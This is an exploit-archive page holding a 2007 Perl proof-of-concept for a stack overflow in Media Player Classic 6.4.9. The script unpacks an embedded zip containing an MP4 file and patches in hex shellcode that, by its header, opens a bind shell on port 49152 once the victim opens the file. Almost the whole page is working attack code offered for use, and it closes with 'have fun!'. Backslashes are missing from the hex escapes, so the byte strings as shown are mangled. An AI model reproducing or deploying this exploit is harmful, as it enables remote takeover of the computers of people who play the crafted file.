Media Player Classic 6.4.9 MP4 File Stack Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Media Player Classic 6.4.9 MP4 File Stack Overflow Exploit
# Published : 2007-12-08
# Author : SYS 49152
# Previous Title : Send ICMP Nasty Garbage (sing) Append File Logrotate Exploit
# Next Title : Microsoft Jet Engine MDB File Parsing Stack Overflow PoC
#!/bin/perl
#
# Media Player Classic 6.4.9 MP4 Stack Overflow
#  
# 0-day discovered and exploited by SYS 49152
#  
# Tested on win XP SP2 ENG
# Shell on port 49152
#  
# usage:
# - download this codec in order to manage MP4 content:
#   http://www.3ivx.com/coral/3ivx_d4_451_win.exe
#  
# - open the MP4 file with mplayerc.exe  
#  
# SYS 49152
# gforce(put the @ here)operamail(put the . here)com
#
# update:
# the latest 5.0.1 codec is still vulnerable
 
use Archive::Zip qw( :ERROR_CODES :CONSTANTS );  
 
$zip_data = # code 724981
"x50x4Bx03x04x14x00x00x00x08x00xB3xB1x30x36xF3".
"x13xD9x53x73x02x00x00x57x04x00x00x19x00x00x00".
"x53x59x53x5Fx34x39x31x35x32x5Fx4Dx50x34x5Fx66".
"x6Fx72x5Fx4Dx50x43x2Ex6Dx70x34x63x60x60xBFx9C".
"x9Bx9Fx5FxC6xC0xC0x90x93x5Bx96x91x02xA4x19x0E".
"xBCxF1x2Bx3BxF0x26x2Cx99x81x81xF9x05x88xCFxC0".
"x08x46x08x80xC2xC1xE4x3Bx30xE0x05x40xD5xECxF1".
"xA5x29x25x89x40x3Ax3Cx37x15x44x83x81x62x46x4A".
"x4Ex11x4Cx51x6Ex4Ax66x51x62x41x41x0Ex92x3Ex76".
"xADxCCx9CxE2x12x20x43x62x65x5Ex62x2Ex90x16x48".
"x49x04x6Bx86x59x2FxB1xB2xBCxA8x04xABxB8x63x50".
"x08x56xF1xC4x9Cx24x4Cx71x36xF3x95xC9xB9x40x73".
"x98x6Fx21x8Bx4Fx40x02xACx4Cx8CxBExBAx8Cx8CxBE".
"x0ExBEx0Dx37x80x04x90x62x85x50x8Cx10xCAx01x42".
"x75x41xA8x06x08x55x0AxA1x58x20x14x37x84xFAxE4".
"xFBx9Ax0CxD0x9Dx16xEExE0xCCxF1xB3xA4xE3xF5x84".
"x41x03x5ExBFx16xCDx99xE0x3AxD1x97x95x05x12x36".
"x01xBEx87x83x23x83x4Dx2Cx0Dx4Dx8Dx14x82x42x7D".
"x5CxA3x14x8Dx4Fx36xBFxDCx70xF3xDDxCDx12x95x2F".
"xD1x8DxC5xC2x2Bx5CxBFxEEx68x7ExFDxE7xD1x97x10".
"x7DxB9xAFx0Ex7BxB8xDCxC3x55xEBxAExF4x24xD6xFD".
"x9Dx72xAEx73xEFx05x17x29xE3xE7xB1x75xCFx3Bx5C".
"xE4x3Ex2Ax17xD6xEDx74x2Bx31x55x64x39x68x7Ax66".
"x7Dx8BxFDxD6x95xEDx72x3Ex93x05x2Fx4ExB8xBBxA0".
"xEEx79x8Fx8BxDCx3Dx65xCFx7DxC6xDFx23xBFx04xAF".
"xCExACx33x3Cx92xF8xF2x66x76x89xDEx1Dx65xB6xA3".
"xC6x2Fx3CxEBx4Ex6Cx79x51xF7x63x81xF4x5CxB3x67".
"xDEx92x2FxC2x27x4Fx7Ex7Dx4ExF7x58xD7x01xA3xB6".
"xAExEFx82x5Cx19x07xFAx24x5Cx26x8Bx72xE5x7Dx3F".
"x23x70x4Fx73xC5xDFx5Dx7FxF5xBFxBBx57xE8xEAx6C".
"x8Cx7DxB1xC8xBDx4Ex6CxD9xEBxDFx62xDBx5ExBFx16".
"xE3xCAx38xA7x6BxBAxE3x9Cx58x4DxA4xADx6ExE0xA2".
"x1Bx4Dx40x39xFDxA7x2FxFFxEEx52xBDxC0xF3xE2x76".
"xE0xFFx5DxCAxAFx41x6Cx5Fx9ExE2x8Fx40xF6x8Bx3F".
"x82x0BxDCx2BxAExCDx8DxBFxD8xDCxF3x3Ex7Cx32x90".
"xADx3CxFFxCEx39xDDx69x57x15x17xCCx7FxF1x31xC7".
"xD2xD0x5Fx7FxA3xA1x57x89xA9x37xD3xEExEDx53xC3".
"xD8x6Fx6AxABxDAx9Fx15x66x7Ex37xF7x54xD8xB7xC7".
"xEEx77x19xB9xF2x3Ex0Bx2Dx7FxF9x53x64xFExCEx9F".
"x22x0Bx5Ex86x4Fx9Dx2Bx5AxE8x60xFDx3Ax7CxF2x7C".
"xF7xF0x22xAEx0Cx65x21x4ExEBx1Cx45xAExBCx5Fx40".
"xFBxDCxBBx45x6FxFCxDExA5xECx5Ex01x0CxC4x52x70".
"x52x4Ex4FxCDxC3x92xC4x15x4Ax8AxB2x41xE2x12x50".
"x71x74xA0x90x92x59x9Cx8Dx47x5ExAAx24xB7x20x1F".
"x48x0Bx41xE5x45xE1x32x92xC9x05x99xA0xDCx29x88".
"x2ExC3x91x0Bx14x01x00x50x4Bx01x02x14x00x14x00".
"x00x00x08x00xB3xB1x30x36xF3x13xD9x53x73x02x00".
"x00x57x04x00x00x19x00x00x00x00x00x00x00x00x00".
"x20x00x00x00x00x00x00x00x53x59x53x5Fx34x39x31".
"x35x32x5Fx4Dx50x34x5Fx66x6Fx72x5Fx4Dx50x43x2E".
"x6Dx70x34x50x4Bx05x06x00x00x00x00x01x00x01x00".
"x47x00x00x00xAAx02x00x00x00x00";
 
my $shellcode = # code 724981
"x33xC9x83xE9xB0xD9xEExD9x74x24xF4x5Bx81x73x13".
"xA8x45xF5xB8x83xEBxFCxE2xF4x54x2Fx1ExF5x40xBC".
"x0Ax47x57x25x7ExD4x8Cx61x7ExFDx94xCEx89xBDxD0".
"x44x1Ax33xE7x5Dx7ExE7x88x44x1ExF1x23x71x7ExB9".
"x46x74x35x21x04xC1x35xCCxAFx84x3FxB5xA9x87x1E".
"x4Cx93x11xD1x90xDDxA0x7ExE7x8Cx44x1ExDEx23x49".
"xBEx33xF7x59xF4x53xABx69x7Ex31xC4x61xE9xD9x6B".
"x74x2ExDCx23x06xC5x33xE8x49x7ExC8xB4xE8x7ExF8".
"xA0x1Bx9Dx36xE6x4Bx19xE8x57x93x93xEBxCEx2DxC6".
"x8AxC0x32x86x8AxF7x11x0Ax68xC0x8Ex18x44x93x15".
"x0Ax6ExF7xCCx10xDEx29xA8xFDxBAxFDx2FxF7x47x78".
"x2Dx2CxB1x5DxE8xA2x47x7Ex16xA6xEBxFBx16xB6xEB".
"xEBx16x0Ax68xCEx2Dx35xB8xCEx16x7Cx59x3Dx2Dx51".
"xA2xD8x82xA2x47x7Ex2FxE5xE9xFDxBAx25xD0x0CxE8".
"xDBx51xFFxBAx23xEBxFDxBAx25xD0x4Dx0Cx73xF1xFF".
"xBAx23xE8xFCx11xA0x47x78xD6x9Dx5FxD1x83x8CxEF".
"x57x93xA0x47x78x23x9FxDCxCEx2Dx96xD5x21xA0x9F".
"xE8xF1x6Cx39x31x4Fx2FxB1x31x4Ax74x35x4Bx02xBB".
"xB7x95x56x07xD9x2Bx25x3FxCDx13x03xEEx9DxCAx56".
"xF6xE3x47xDDx01x0Ax6ExF3x12xA7xE9xF9x14x9FxB9".
"xF9x14xA0xE9x57x95x9Dx15x71x40x3BxEBx57x93x9F".
"x47x57x72x0Ax68x23x12x09x3Bx6Cx21x0Ax6ExFAxBA".
"x25xD0x47x8Bx15xD8xFBxBAx23x47x78x45xF5xB8";
 
open(code, ">tempzip.zip") || die "Can't Write temporary Filen";
binmode (code);
print code $zip_data;
close (code);
print "nTemporary file ready, patching..n";
my $zip = Archive::Zip->new();
$zip->read( 'tempzip.zip' ) ;
$zip->extractMember( 'SYS_49152_MP4_for_MPC.mp4' );
open(code, "+<SYS_49152_MP4_for_MPC.mp4") || die "Can't Open temporary Filen";
binmode (code);
seek code,619,0;
print code $shellcode;
close (code);
print "Shellcode added, have fun!n";

# www.Syue.com [2007-12-08]